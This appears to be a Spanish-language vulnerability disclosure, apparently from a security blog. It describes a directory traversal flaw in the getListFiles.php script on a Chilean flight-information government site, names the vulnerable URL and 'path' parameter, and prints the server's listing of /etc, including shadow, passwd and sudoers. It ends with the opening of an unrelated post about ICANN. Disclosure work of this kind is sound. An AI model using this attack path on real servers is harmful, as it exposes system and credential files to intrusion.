Una vulnerabilidad del tipo Directory Traversal, que nos permite navegar por los directorios del servidor, fue detectada en el sitio web de Internet Flight Information Service. El sitio web corresponde a http://www.aipchile.gob.cl y mediante el script php getListFiles.php es posible listar el contenido de los distintos directorios del servidor. Dicho script no valida correctamente el […]
Una vulnerabilidad del tipo Directory Traversal, que nos permite navegar por los directorios del servidor, fue detectada en el sitio web de Internet Flight Information Service.
El sitio web corresponde a http://www.aipchile.gob.cl y mediante el script php getListFiles.php es posible listar el contenido de los distintos directorios del servidor. Dicho script no valida correctamente el valor de la variable path. Originalmente el script se utiliza para revisar el estado de cámaras y se accede desde la URL http://www.aipchile.gob.cl/getListFiles.php?path=camara/ftp/STA…/Sur, sin embargo, modificando el valor de path podemos subir de nivel y listar directorios hasta llegar a la raíz.
Por ejemplo, listamos el directorio /etc
El servidor nos entrega una lista con los directorios y archivos dentro del path especificado.
{“0″:”blkid.tab”,”1177727229″:”gnome-vfs-mime-magic”,”1212128523″:”ucf.conf”,”1235044662″:”logrotate.conf”,”1248534782″:”ltrace.conf”,”1259223815″:”zsh_command_not_found”,”1259856668″:”rpc”,”1259927181″:”lsb-base-logging.sh”,”1264587991″:”deluser.conf”,”1266922272″:”lsb-base”,”1267036005″:”rsyslog.conf”,”1267941508″:”ts.conf”,”1269280607″:”blkid.conf”,”1269434112″:”updatedb.conf”,”1270150122″:”magic”,”1272015944″:”nsswitch.conf”,”1273458206″:”insserv.conf”,”1273468975″:”libpaper.d”,”1273476856″:”nanorc”,”1274008728″:”mtools.conf”,”1275300352″:”inputrc”,”1275427270″:”mime.types”,”1276563336″:”hdparm.conf”,”1276598129″:”rmt”,”1276895632″:”screenrc”,”1277667522″:”at.deny”,”1281023834″:”locale.alias”,”1281137953″:”bash_completion”,”1281473254″:”bash.bashrc”,”1282013258″:”pam.conf”,”1282070974″:”manpath.config”,”1282157177″:”mke2fs.conf”,”1282682757″:”crontab”,”1283510657″:”login.defs”,”1283528208″:”wgetrc”,”1284138108″:”bindresvport.blacklist”,”1284138111″:”gai.conf”,”1285579308″:”fuse.conf”,”1285621446″:”debconf.conf”,”1286441275″:”lsb-release”,”1286442911″:”issue”,”1301080886″:”ftpusers”,”1305800435″:”iscsi”,”1305815208″:”hosts”,”1305815757″:”kernel”,”1305815762″:”opt”,”1305815778″:”terminfo”,”1305815783″:”environment”,”1305815784″:”python2.6″,”1305815785″:”adduser.conf”,”1305815786″:”depmod.d”,”1305815793″:”logcheck”,”1305815796″:”iproute2″,”1305815798″:”cron.monthly”,”1305815799″:”vim”,”1305815801″:”kbd”,”1305815803″:”console-setup”,”1305815814″:”lvm”,”1305818597″:”perl”,”1305818985″:”fonts”,”1305820063″:”ca-certificates”,”1305820068″:”apm”,”1305820081″:”ca-certificates.conf”,”1305820084″:”calendar”,”1305820085″:”groff”,”1305820086″:”cron.weekly”,”1305820092″:”chatscripts”,”1305820093″:”ufw”,”1305820094″:”hosts.allow”,”1305820191″:”pm”,”1305820192″:”grub.d”,”1305820807″:”kernel-img.conf”,”1305820809″:”sudoers”,”1305821060″:”security”,”1305821115″:”apparmor.d”,”1305821116″:”profile.d”,”1305821117″:”ldap”,”1305821118″:”w3m”,”1305821119″:”apparmor”,”1305821154″:”gamin”,”1305826049″:”cron.daily”,”1305830611″:”php5″,”1305831014″:”ConsoleKit”,”1305831015″:”xdg”,”1305831021″:”polkit-1″,”1305831026″:”gnome-vfs-2.0″,”1305831033″:”dbus-1″,”1305831037″:”pango”,”1305831038″:”papersize”,”1305831039″:”bonobo-activation”,”1305831040″:”obex-data-server”,”1305831083″:”gconf”,”1306764052″:”rc1.d”,”1309792793″:”pear”,”1309793244″:”dpkg”,”1309793719″:”mailcap”,”1309793913″:”ld.so.conf”,”1309795739″:”group-“,”1309795986″:”vsftpd.conf”,”1309797705″:”network”,”1309957244″:”shadow-“,”1328537093″:”updatedb.conf.old.0″,”1333139132″:”updatedb.conf.old.1″,”1339084724″:”ghostscript”,”1346938354″:”lighttpd”,”1346938799″:”cron.d”,”1346938926″:”awstats”,”1358621945″:”resolv.conf”,”1361544879″:”vga”,”1368804766″:”rsyslog.d”,”1378993840″:”apt”,”1383609049″:”ssh”,”1392404976″:”passwd”,”1392404977″:”gshadow”,”1392404990″:”shadow”,”1392406451″:”sysctl.d”,”1392406987″:”sysctl.conf”,”1410442776″:”gdm”,”1410442777″:”defoma”,”1410442781″:”pulse”,”1410442782″:”gtk-2.0″,”1410442783″:”default”,”1410873222″:”byobu”,”1415108000″:”mtab”,”1415369852″:”rc.local”,”1415989185″:”apache2″,”1422977578″:”mysql”,”1423764549″:”postgresql-common”,”1423764603″:”alternatives”,”1426602600″:”localtime”,”1426683143″:”rc0.d”,”1426683146″:”updatedb.conf.old.2″,”1426683159″:”fstab”,”1426683162″:”init”,”1426683164″:”pam.d”,”1426683166″:”ld.so.conf.d”,”1426683178″:”vmware-tools”,”1429188903″:”motd”}
Se intentó reportar la vulnerabilidad hace más de 1 mes sin ningun tipo de respuesta.
La vulnerabilidad ha sido catalogada con el ID #2616.
ICANN es la responsable de asignar las direcciones del IP, de las funciones de gestión del sistema de dominio y de la administración del sistema de servidores raíz (root-servers), entre sus funciones más importantes. El año 2014 ya había sido víctima de un ataque que comprometió cierta información de las zonas de sus DNS. Con […]